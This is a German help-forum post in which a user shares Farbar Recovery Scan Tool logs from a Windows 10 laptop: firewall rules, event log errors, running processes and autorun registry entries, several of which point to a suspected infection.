FirewallRules: [{F798BCDB-4C1B-4A75-9A1A-B754D246EF44}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{A1C84D1F-E207-428F-9A11-7C3D5887517B}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{3D4A535D-7BD8-4EEB-9DBB-B495FDF1FB76}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{EA243917-0ED1-4AC3-892E-E75E69E85ADD}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{33F72E10-AFF6-4BCA-8C05-FDDFA7F7F7C3}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteRedConsolHost.exe
FirewallRules: [{68CB1F80-BA9C-482D-BB2D-677FFBFEF16A}] => C:\Program Files\Cimatron\CimatronE\Program\CimatronE.exe
FirewallRules: [{A171EC02-48FD-4221-AB23-6005EE5637B4}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteBoxManager.exe
FirewallRules: [{65380630-63BE-4835-A178-BCADECC758AA}] => C:\Program Files (x86)\Steam\steamapps\common\Leap of Fate\LoF.exe
FirewallRules: [{B5CFDA5D-8776-4383-8F5F-B76FA77C5ADF}] => C:\Program Files (x86)\Steam\steamapps\common\Leap of Fate\LoF.exe
FirewallRules: [{6907F5CD-3E9A-4E9A-AF7D-659F15399D49}] => C:\Program Files (x86)\Steam\steamapps\common\Legends of Pixelia\Legends of Pixelia.exe
FirewallRules: [{3CECCF84-A0F4-4A26-8EE4-2A1C7244B235}] => C:\Program Files (x86)\Steam\steamapps\common\Legends of Pixelia\Legends of Pixelia.exe
FirewallRules: [{612445B6-6A40-49B6-AE58-804F7BF90422}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteRedConsolHost.exe
FirewallRules: [{EACCBFE3-C8CD-41C5-A91F-AD18D3CBF08E}] => C:\Program Files\Cimatron\CimatronE\Program\CimRemoteWorker.exe
FirewallRules: [{3F7B93DA-04CF-47CE-BE6A-1FAB0995F92B}] => C:\WINDOWS\system32\hasplms.exe
FirewallRules: [{096A419B-62BA-441A-BC77-FAB03072256A}] => C:\Cimatron E13\Program\CimRemoteRedConsolHost.exe
FirewallRules: [{8680F965-A9EC-4271-93B4-505F6466C0FF}] => C:\Cimatron E13\Program\CimatronE.exe
FirewallRules: [{DDCA80CC-D6CE-4D39-BD18-C101BBA5076A}] => C:\Cimatron E13\Program\CimRemoteBoxManager.exe
FirewallRules: [{9935DE82-D3C7-455A-8148-E4A2BD21DCBC}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{990A8079-F4EB-4509-BCBF-E059611C3FC7}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{185A022C-9E6A-4647-B71A-6B9817AA1CBF}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{575809EB-3973-4A72-8D33-7DC5F16342B7}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{B6A4366A-DA4F-43E4-8555-F125769D7C8B}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{7F74F2FC-B42F-4D71-B201-0195D17FD6E5}] => C:\Program Files\SogouInput\8.1.0.8588\SGTool.exe
FirewallRules: [{985C7414-DC1D-4E82-94E3-CC2605D736AB}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{54195CC1-AD9D-4998-8172-921D05D97089}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{566CF440-5F41-42BC-86E1-2C64124490AD}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{81E0ED6C-D16A-43EE-B7F5-99A91E6C597D}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{7A016A10-0A8B-4273-A89D-7AEB693826F3}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{B8A5162A-D06B-4D53-BE24-312DBF4B8203}] => C:\Program Files\SogouInput\8.1.0.8588\PinyinUp.exe
FirewallRules: [{EDE1A8F3-1D58-4D6F-8967-04297A1197AB}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{BC483936-A171-4A92-9AA9-3C52D2BEF9F8}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{CF4146B2-62E6-48E4-8478-F24375111FC5}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{4FB6FE8F-7145-4338-ABFE-E412FFEF8412}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{56A8A485-3B98-480F-BFAE-6DF7A0212840}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{03DBD3CA-1AD9-40FA-8F02-939EAECDB990}] => C:\Program Files\SogouInput\8.1.0.8588\SGDownload.exe
FirewallRules: [{5A23DF0C-FE19-46C9-9D70-171735056747}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{A25A85F0-2797-4A9B-9340-5769313C4323}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{BEEA45A0-3546-4241-AAF9-ED51EB1A1644}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{2C9200BD-1504-4379-981E-A01B1FB2B1C0}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{5BFCE98B-5E70-4DB8-B281-F4259913B610}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{6860966F-7701-4302-88B3-FF5B39DF7EC2}] => C:\Program Files\SogouInput\8.1.0.8588\SogouCloud.exe
FirewallRules: [{B751DED2-5796-45A5-AFB5-6AA8CF25308A}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{A402CC30-5D3C-41DD-A0A4-9F862F947A64}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{B3976A15-41DD-4BCB-9BFA-02A8CA5D0E93}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{B9AE4A8A-2213-49B2-85F3-5819E5D8E9DD}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{06FB5740-E816-43A3-BD23-3B737FCD031E}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{B31C6B22-6986-41C8-8625-18EFA04F06B6}] => C:\Program Files\SogouInput\Components\SogouComMgr.exe
FirewallRules: [{372BA32F-C576-4485-8B0C-2B21686E362E}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{6D3DCEDE-22AC-4DAA-8B7E-3EAE40BB8E73}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{BBA09CFE-8FFC-4E12-8F79-17581FF99D51}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{4A38FEC6-47EA-4DBA-85DB-F3165E2755A4}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{E0125ADA-5CAA-4A26-B106-DE3EAD794F4A}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{25366F8D-4DB8-4544-9C5C-3A1F5C4AA82B}] => C:\Program Files\SogouInput\8.1.0.8588\userNetSchedule.exe
FirewallRules: [{2E709EE1-79E0-4A30-AD23-30A0594C0EC0}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{DEC9358B-ED88-48DF-965E-238A03FAB10A}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{8E722A9E-3D82-41C9-A6BC-042ECA42C3D5}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{393DA665-55A1-4B7F-9044-BB0AD113F3D8}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{C4A26A66-A7EC-417F-A8E9-CCBB78D38B91}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{DD1A2841-49AB-414A-9FB6-3A7205E015A5}] => C:\Program Files\SogouInput\8.1.0.8588\SGMedalLoader.exe
FirewallRules: [{65995093-15F6-444F-B8EE-C2B97DF5C04F}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{DF61DDC9-3D41-4E72-853B-BDAA2F2BC223}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{C45AD099-CB85-460B-803E-E4A51392C38B}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{647D2FEC-9540-4098-8901-49CB0CC72BA7}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{1F608F1A-4F10-46B5-B6FA-E299724EC679}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{97289FA1-85A7-4225-806A-A5E034E602E0}] => C:\Users\Public\SogouInput\USBDT\OctopusDownloader.exe
FirewallRules: [{CE57EF4C-239D-4A77-A9CF-673A3F733419}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{A1BA72F8-F488-4AB8-B8EE-CE1E1DA04261}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{49452CC4-C124-40D7-866B-BDA3D10CA632}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{58AD4E86-91F1-4263-A4C6-AD79F7FD9918}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{4DE9B0A0-7B7F-41DD-B115-71532D9EDB63}] => C:\Program Files (x86)\Steam\steamapps\common\Phantom Breaker Battle Grounds\bin\pbbg_win32.exe
FirewallRules: [{F6D306F3-0054-4B9C-B691-00FC88976995}] => C:\Program Files (x86)\Steam\steamapps\common\Phantom Breaker Battle Grounds\bin\pbbg_win32.exe
FirewallRules: [{6F765953-4976-4714-804A-811BAFA6E151}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{F2E9BBF5-2EC3-4983-B606-1F61508156B7}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{686D3529-E62B-4E90-A104-7B60BBC05F23}] => C:\Program Files (x86)\Steam\steamapps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{D7E4966C-BAE8-468F-94CC-55E2BAEA1D50}] => C:\Program Files (x86)\Steam\steamapps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{7DA1BAD8-2869-47BA-B670-7859687B0ACC}] => C:\Program Files (x86)\Steam\steamapps\common\DeathRoadToCanada\prog.exe
FirewallRules: [{3CC78B1C-2CC4-4BCD-BF1E-E90514237A9C}] => C:\Program Files (x86)\Steam\steamapps\common\DeathRoadToCanada\prog.exe
FirewallRules: [{295417FD-3BEA-4490-BAD6-11124DF16ACC}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{1917382F-FD06-4FBC-ACFE-3AA457FE67B7}] => C:\WINDOWS\system32\rundll32.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Wiederherstellungspunkte =========================

28-11-2016 17:33:57 Geplanter Prüfpunkt
01-12-2016 20:34:10 DirectX wurde installiert
02-12-2016 23:16:12 JRT Pre-Junkware Removal
02-12-2016 23:42:43 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (12/03/2016 11:06:37 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: linkset.exe, Version: 0.0.0.0, Zeitstempel: 0x584291c3
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc00001a5
Fehleroffset: 0x014ff8bc
ID des fehlerhaften Prozesses: 0xa98
Startzeit der fehlerhaften Anwendung: 0x01d24d4cee9c3554
Pfad der fehlerhaften Anwendung: C:\Windows\Temp\linkset.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 32a52f16-889f-436f-9f71-6c66e685fb42
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (12/02/2016 11:42:44 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (12/02/2016 11:39:52 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm AdwCleaner_6.030.exe, Version 6.0.3.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 144c

Startzeit: 01d24cec11363d19

Beendigungszeit: 4294967295

Anwendungspfad: C:\Users\Patrick\Desktop\AdwCleaner_6.030.exe

Berichts-ID: 3c78461d-b8e0-11e6-985f-201a06114318

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (12/02/2016 11:16:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-I54T4B7)
Description: Bei der Aktivierung der App „Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App“ ist folgender Fehler aufgetreten: -2147023170. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (12/02/2016 11:16:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-I54T4B7)
Description: Bei der Aktivierung der App „Microsoft.WindowsStore_8wekyb3d8bbwe!App“ ist folgender Fehler aufgetreten: -2147023170. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (12/02/2016 11:16:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-I54T4B7)
Description: Bei der Aktivierung der App „Microsoft.WindowsAlarms_8wekyb3d8bbwe!App“ ist folgender Fehler aufgetreten: -2147023170. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (12/02/2016 11:16:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (12/02/2016 11:13:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ctfmon.exe, Version: 10.0.14393.0, Zeitstempel: 0x57899148
Name des fehlerhaften Moduls: InputService.dll, Version: 10.0.14393.206, Zeitstempel: 0x57dacf17
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00057f66
ID des fehlerhaften Prozesses: 0x64
Startzeit der fehlerhaften Anwendung: 0x01d24ce85b0dec19
Pfad der fehlerhaften Anwendung: C:\WINDOWS\SysWoW64\ctfmon.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\system32\InputService.dll
Berichtskennung: 4e7063d6-1fad-4d86-b55e-c2b5ef824d23
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (12/02/2016 11:08:12 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Die erweiterbare Leistungsindikator-DLL rdyboost kann nicht geladen werden. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Windows-Fehlercode.

Error: (12/02/2016 11:08:12 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.


Systemfehler:
=============
Error: (12/03/2016 07:37:27 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 10:39:23 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Netzwerkdienst" (SID: S-1-5-20) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
 und der APPID
{7006698D-2974-4091-A424-85DD0B909E23}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 10:39:15 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Netzwerkdienst" (SID: S-1-5-20) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
 und der APPID
{7006698D-2974-4091-A424-85DD0B909E23}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 10:36:48 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 02:32:49 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (12/03/2016 02:30:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "bespakduct" wurde aufgrund folgenden Fehlers nicht gestartet:
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (12/03/2016 02:30:37 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst bespakduct erreicht.

Error: (12/02/2016 11:43:51 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Plattformdienst für verbundene Geräte" wurde mit folgendem Fehler beendet:
Unbekannter Fehler

Error: (12/02/2016 11:42:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA LocalSystem Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/02/2016 11:41:53 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2016-10-11 15:44:29.852
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe) attempted to load \Device\HarddiskVolume4\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-3612QM CPU @ 2.10GHz
Prozentuale Nutzung des RAM: 25%
Installierter physikalischer RAM: 8007.27 MB
Verfügbarer physikalischer RAM: 5931.95 MB
Summe virtueller Speicher: 9287.27 MB
Verfügbarer virtueller Speicher: 7161.87 MB

==================== Laufwerke ================================

Drive c: (SSD) (Fixed) (Total:231.52 GB) (Free:84.22 GB) NTFS
Drive d: (HDD) (Fixed) (Total:465.76 GB) (Free:143.6 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: 08CA1AAA)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

Machalla666 03.12.2016 19:45
Und hier die frst.txt:

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-12-2016
durchgeführt von Patrick (Administrator) auf DESKTOP-I54T4B7 (03-12-2016 19:41:41)
Gestartet von C:\Users\Patrick\Desktop
Geladene Profile: Patrick (Verfügbare Profile: Patrick)
Platform: Windows 10 Home Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
() C:\Program Files\BitTorrent\BitTorrent.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(SafeNet Inc.) C:\Windows\System32\hasplms.exe
() C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(YANDEX LLC) C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Windows\Temp\netstream.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\System32\InputMethod\CHS\ChsIME.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\InputMethod\CHS\ChsIME.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(      Ghisler          Software  GmbH) C:\Users\Patrick\AppData\Local\Idhsoft\mgl64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Dritek System Inc.) C:\Program Files (x86)\RadioController\RfBtnHelper.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\OGMMon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.261.0_x64__kzf8qxf38zg5c\SkypeHost.exe


==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3242696 2015-10-07] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13653208 2013-09-13] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-30] (Realtek Semiconductor)
HKLM-x32\...\Run: [RadioController] => C:\Program Files (x86)\RadioController\RfBtnHelper.exe [111216 2015-12-22] (Dritek System Inc.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [226816 2016-05-23] (Geek Software GmbH)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
HKLM-x32\...\Run: [OGMgmmouseRun] => C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\ogmmon.exe [3386880 2014-05-19] ()
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-09-07] (Atheros Communications)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
